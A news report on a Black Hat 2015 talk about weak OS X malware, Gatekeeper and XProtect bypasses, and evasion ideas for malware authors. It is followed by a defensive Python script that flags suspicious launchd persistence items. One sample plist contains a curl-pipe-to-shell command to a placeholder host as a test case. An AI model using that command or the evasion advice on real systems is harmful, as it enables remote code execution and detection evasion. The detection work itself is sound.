Black Hat 2015: Mac OS X malware is mediocre, but could be better
Patrick Wardle demonstrated how to create more effective malware for OS X.
Apple technology is considered by many to be a lot more secure than other products, but that may not be the case.
In a jam-packed Wednesday session at Black Hat USA 2015 in Las Vegas, Patrick Wardle, director of research with Synack, explained that the current state of OS X malware is pretty mediocre, but has the potential to be a whole lot better.
Wardle kicked off the session discussing currently available malware, such as OSX/XSLCmd, OSX/iWorm, and OSX/WireLurker. He said that these threats show up as processes on the system and are therefore not very sophisticated, but he noted that OSX/WireLurker is slightly more interesting because it can infect iOS.
“Security conscious users,” those who do not click on links or attachments in unexpected emails and who frequently update and patch, “are probably going to be fine” against these types of threats, Wardle said, adding that he gives current OS X malware a grade of C+ since it is easy to detect and prevent.
In the quest to create a more sophisticated OS X threat, Wardle pointed to defensive mechanisms such as Gatekeeper, XProtect and the OS X sandbox, saying that “a few things are going to prevent this from being successful.”
But Wardle found a way around them all. He explained that Gatekeeper only verifies the app bundle itself, so it mostly protects users who would otherwise be tricked into running a fake installer; that XProtect does a decent job of blocking known malware but, as a signature-based check, is trivial to bypass; and that with new sandbox escapes being identified, “I really don't think this is an obstacle for any advanced adversaries.”
While Wardle said that all of the bypasses require root, he added that obtaining it is not that complicated.
Additionally, Wardle noted that OS X malware authors should consider better self-defense techniques, including encrypting the malware and making it harder to delete. He added that detecting detections is also a “great early warning system,” and can be done by registering the malware's hash as a Google AdWords keyword, so the author is notified when a researcher searches for that hash.
In his research, Wardle said he installed all available OS X security products, such as Norton and Avast, and none of them detected his malware. He pointed to free tools such as KnockKnock, BlockBlock and TaskExplorer as better defense options against OS X threats.
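The tools named above work by enumerating where OS X keeps persistent items (KnockKnock) or watching those locations for new entries (BlockBlock). The script below is an added example, not code from those tools or from Wardle's talk: it parses launchd property lists, the LaunchAgent/LaunchDaemon mechanism malware commonly uses to survive reboot, and applies a few triage heuristics a defender would want. The sample plists, the file names and the heuristics (user, temp or hidden binary paths; interpreters as persistent jobs; URLs in arguments; Apple-style labels pointing at non-Apple binaries) are constructed for the example.

```python
"""Triage launchd persistence items (LaunchAgents / LaunchDaemons).

Added example: parses launchd plists and flags entries worth a closer look.
Runs offline on the constructed samples at the bottom; on a real system you
would feed it the files from LAUNCHD_DIRS instead.
"""
import plistlib
import re
from typing import Dict, List

# Directories launchd scans for persistent jobs (system-wide and per-user).
LAUNCHD_DIRS = [
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
    "/System/Library/LaunchAgents",
    "/System/Library/LaunchDaemons",
    "~/Library/LaunchAgents",
]

# Heuristics are assumptions for this example, not a vendor rule set.
USER_OR_TEMP_PATH = re.compile(
    r"^(/tmp/|/var/tmp/|/private/tmp/|/Users/[^/]+/(?!Library/)|.*/\.[^/]+/)"
)
INTERPRETERS = ("/sh", "/bash", "/zsh", "/python", "/perl", "/osascript")
APPLE_BINARY_PREFIXES = ("/System/", "/usr/", "/Library/Apple/")


def parse_launch_item(data: bytes) -> Dict[str, object]:
    """Extract the fields that matter for triage from a launchd plist."""
    plist = plistlib.loads(data)
    args = list(plist.get("ProgramArguments") or [])
    program = plist.get("Program") or (args[0] if args else None)
    return {
        "label": plist.get("Label") or "",
        "program": program,
        "args": args,
        "run_at_load": bool(plist.get("RunAtLoad", False)),
        # KeepAlive may be a bool or a dict of conditions; either way launchd
        # will restart the job, which is what matters for persistence.
        "keep_alive": plist.get("KeepAlive") not in (None, False),
    }


def triage(item: Dict[str, object]) -> List[str]:
    """Return human-readable reasons an item deserves review (empty if none)."""
    reasons: List[str] = []
    prog = item["program"]
    label = str(item["label"])
    if prog is None:
        return ["no Program or ProgramArguments"]
    prog = str(prog)
    if USER_OR_TEMP_PATH.match(prog):
        reasons.append(f"binary in user, temp or hidden path: {prog}")
    if prog.endswith(INTERPRETERS):
        reasons.append(f"interpreter used as persistent job: {prog}")
    if any("http://" in a or "https://" in a for a in item["args"]):
        reasons.append("URL in arguments (fetches something at launch)")
    if item["run_at_load"] and item["keep_alive"]:
        reasons.append("RunAtLoad and KeepAlive set (starts at login, restarts if killed)")
    if label.startswith("com.apple.") and not prog.startswith(APPLE_BINARY_PREFIXES):
        reasons.append(f"Apple-style label but non-Apple binary: {label}")
    return reasons


def scan(items: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Map each plist file name to its triage reasons."""
    return {name: triage(parse_launch_item(data)) for name, data in items.items()}


# Constructed sample plists (not real malware): one benign, two suspicious.
SAMPLES: Dict[str, bytes] = {
    "com.example.agent.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.agent</string>
  <key>Program</key><string>/usr/libexec/exampleagent</string>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
    "com.apple.softwareupdate.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdate</string>
  <key>ProgramArguments</key><array>
    <string>/Users/bob/.cache/updater</string><string>--silent</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>""",
    "com.update.helper.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.update.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -s http://example.invalid/p | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
}

if __name__ == "__main__":
    for name, reasons in scan(SAMPLES).items():
        print(name, "->", reasons or "ok")
```

On a live system, replace SAMPLES with the contents of each .plist under LAUNCHD_DIRS; the heuristics only prioritise review, so a flagged item still needs its binary's signature and origin checked before anything is removed.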